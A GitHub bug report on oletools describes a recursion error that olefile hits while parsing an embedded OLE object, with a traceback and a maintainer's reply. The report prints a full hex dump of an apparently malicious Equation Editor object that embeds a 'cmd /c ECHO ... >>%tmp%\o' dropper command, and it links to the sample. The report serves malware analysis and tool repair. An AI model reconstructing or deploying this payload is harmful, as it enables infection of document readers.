Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Recursion Error in olefile #311

Open
malware-kitten opened this issue May 14, 2018 · 1 comment
Open

Recursion Error in olefile #311

malware-kitten opened this issue May 14, 2018 · 1 comment
Assignees
@decalage2
Labels
🐛 bug olefile
Milestone
Next Release

Comments

@malware-kitten
Copy link

I think that this is a case where recursion is running further than intended... An object is 0xc00 in length and recursion limits are being hit.

The full contents of the equation object are

00000000  d0 cf 11 e0 a1 b1 1a e1  00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00  3e 00 03 00 fe ff 09 00  |........>.......|
00000020  06 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00  |................|
00000030  01 00 00 00 00 00 00 00  00 10 00 00 02 00 00 00  |................|
00000040  01 00 00 00 fe ff ff ff  00 00 00 00 00 00 00 00  |................|
00000050  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
*
00000200  fd ff ff ff 04 00 00 00  fe ff ff ff fe ff ff ff  |................|
00000210  fe ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
00000220  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
*
00000400  52 00 6f 00 6f 00 74 00  20 00 45 00 6e 00 74 00  |R.o.o.t. .E.n.t.|
00000410  72 00 79 00 00 00 00 00  00 00 00 00 00 00 00 00  |r.y.............|
00000420  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000440  16 00 05 00 ff ff ff ff  ff ff ff ff 02 00 00 00  |................|
00000450  02 ce 02 00 00 00 00 00  c0 00 00 00 00 00 00 46  |...............F|
00000460  00 00 00 00 00 00 00 00  00 00 00 00 20 ad 3d 77  |............ .=w|
00000470  2a 60 d3 01 03 00 00 00  00 02 00 00 00 00 00 00  |*`..............|
00000480  01 00 4f 00 6c 00 65 00  00 00 00 00 00 00 00 00  |..O.l.e.........|
00000490  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000004c0  0a 00 02 01 ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
000004d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000004f0  00 00 00 00 00 00 00 00  14 00 00 00 00 00 00 00  |................|
00000500  01 00 43 00 6f 00 6d 00  70 00 4f 00 62 00 6a 00  |..C.o.m.p.O.b.j.|
00000510  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000540  12 00 02 01 01 00 00 00  03 00 00 00 ff ff ff ff  |................|
00000550  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000570  00 00 00 00 01 00 00 00  66 00 00 00 00 00 00 00  |........f.......|
00000580  03 00 4f 00 62 00 6a 00  49 00 6e 00 66 00 6f 00  |..O.b.j.I.n.f.o.|
00000590  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000005c0  12 00 02 01 ff ff ff ff  04 00 00 00 ff ff ff ff  |................|
000005d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000005f0  00 00 00 00 03 00 00 00  06 00 00 00 00 00 00 00  |................|
00000600  fe ff ff ff 02 00 00 00  fe ff ff ff fe ff ff ff  |................|
00000610  05 00 00 00 06 00 00 00  07 00 00 00 fe ff ff ff  |................|
00000620  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
*
00000800  01 00 00 02 08 00 00 00  00 00 00 00 00 00 00 00  |................|
00000810  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000840  01 00 fe ff 03 0a 00 00  ff ff ff ff 02 ce 02 00  |................|
00000850  00 00 00 00 c0 00 00 00  00 00 00 46 17 00 00 00  |...........F....|
00000860  4d 69 63 72 6f 73 6f 66  74 20 45 71 75 61 74 69  |Microsoft Equati|
00000870  6f 6e 20 33 2e 30 00 0c  00 00 00 44 53 20 45 71  |on 3.0.....DS Eq|
00000880  75 61 74 69 6f 6e 00 0b  00 00 00 45 71 75 61 74  |uation.....Equat|
00000890  69 6f 6e 2e 33 00 f4 39  b2 71 00 00 00 00 00 00  |ion.3..9.q......|
000008a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000008c0  00 00 03 00 04 00 00 00  00 00 00 00 00 00 00 00  |................|
000008d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000900  1c 00 00 00 02 00 c2 c1  d4 00 00 00 00 00 00 00  |................|
00000910  98 9e 27 00 6c 6d 26 00  00 00 00 00 03 01 01 03  |..'.lm&.........|
00000920  0a 0a 01 03 1d 01 00 01  08 02 00 63 6d 64 20 2f  |...........cmd /|
00000930  63 20 45 43 48 4f 3a 53  6a 4e 58 61 55 52 42 59  |c ECHO:SjNXaURBY|
00000940  57 45 76 5a 53 35 6f 64  47 45 3d 3e 3e 25 74 6d  |WEvZS5odGE=>>%tm|
00000950  70 25 5c 6f 26 20 20 12  0c 43 00 02 7e 33 00 02  |p%\o&  ..C..~3..|
00000960  7e 33 00 02 7e 32 00 03  18 01 00 00 02 7e 33 00  |~3..~2.......~3.|
00000970  00 0b 01 02 7e 33 00 02  7e 33 00 02 e3 30 00 27  |....~3..~3...0.'|
00000980  e3 40 00 01 10 d0 28 62  b2 20 00 00 b0 00 27 e3  |.@....(b. ....'.|
00000990  40 00 00 10 27 e3 40 00  27 e3 30 00 27 e2 86 11  |@...'.@.'.0.'...|
000009a0  22 00 0a 02 86 d7 00 03  0d 01 00 01 02 7e 30 00  |"............~0.|
000009b0  27 e3 40 00 27 e3 20 00  27 e3 40 00 27 e3 30 00  |'.@.'. .'.@.'.0.|
000009c0  02 7e 31 00 02 7e 34 00  00 0b 01 02 7e 33 00 02  |.~1..~4.....~3..|
000009d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000009e0  00 10 07 50 06 10 07 40  06 90 06 f0 06 e0 02 00  |...P...@........|
000009f0  04 e0 06 90 07 60 06 50  00 00 00 00 00 00 00 00  |.....`.P........|
00000a00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000a10  00 00 00 00 20 0f ff ff  ff ff ff ff ff ff ff ff  |.... ...........|
00000a20  ff f0 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000a30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 04 00  |................|
00000a40  00 00 f0 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000a50  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000a70  00 00 00 00 00 00 00 00  00 00 00 00 0f ff ff ff  |................|
00000a80  ff ff ff ff ff ff ff ff  f0 00 00 00 00 00 00 00  |................|
00000a90  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000ae0  00 00 00 0f ff ff ff ff  ff ff ff ff ff ff 00 00  |................|
00000af0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000b40  00 00 00 00 00 00 00 00  00 00 0f ff ff ff ff ff  |................|
00000b50  ff ff ff 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000b60  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000b70  00 00 00 00 00 00 00 00  00 00 00 10 50 00 00 50  |............P..P|
00000b80  00 00 00 d0 00 04 14 64  94 c4 55 04 94 35 40 0f  |.......d..U..5@.|
00000b90  81 f0 00 00 af bf f0 08  00 f8 1f f6 04 00 00 00  |................|
00000ba0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000c00

When running oleobj against the embedded object the following error is hit.

oleobj 0.52.4 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

-------------------------------------------------------------------------------
File: './068856a2a048786109fd825130f29bf1_object_00018402.bin'
ERROR    Caught exception opening ./068856a2a048786109fd825130f29bf1_object_00018402.bin
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/oletools/oleobj.py", line 629, in find_ole
    ole = olefile.OleFileIO(arg_for_ole)
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1211, in __init__
    self.open(filename, write_mode=write_mode)
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1479, in open
    self.loaddirectory(self.first_dir_sector)
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1844, in loaddirectory
    self.root.build_storage_tree()
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1021, in build_storage_tree
    self.append_kids(self.sid_child)
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1074, in append_kids
... Output snipped ...
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1052, in append_kids
    child = self.olefile._load_direntry(child_sid) #direntries[child_sid]
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1864, in _load_direntry
    "double reference for OLE stream/storage")
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1237, in _raise_defect
    log.warning(message)
  File "/usr/lib/python2.7/logging/__init__.py", line 1178, in warning
    if self.isEnabledFor(WARNING):
RuntimeError: maximum recursion depth exceeded

Even though oleobj shouldn't produce any real output in this scenario, it seems to me that a recursion bug exists and should be handled by olefile.

The following object can be downloaded here -> https://drive.google.com/open?id=1EHrNlgSDr6NH7qMLS5vFh309IVwigCTZ
password: oletools
@decalage2 decalage2 self-assigned this May 14, 2018
@decalage2 decalage2 added this to the oletools 0.5x milestone May 14, 2018
@enkelli
Copy link
Contributor

enkelli commented May 27, 2018
edited
Loading

Probably similar with this olefile repo PR

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@decalage2 decalage2

Labels
🐛 bug olefile
Projects
None yet
Milestone
Next Release
Development

No branches or pull requests
3 participants
@malware-kitten @decalage2 @enkelli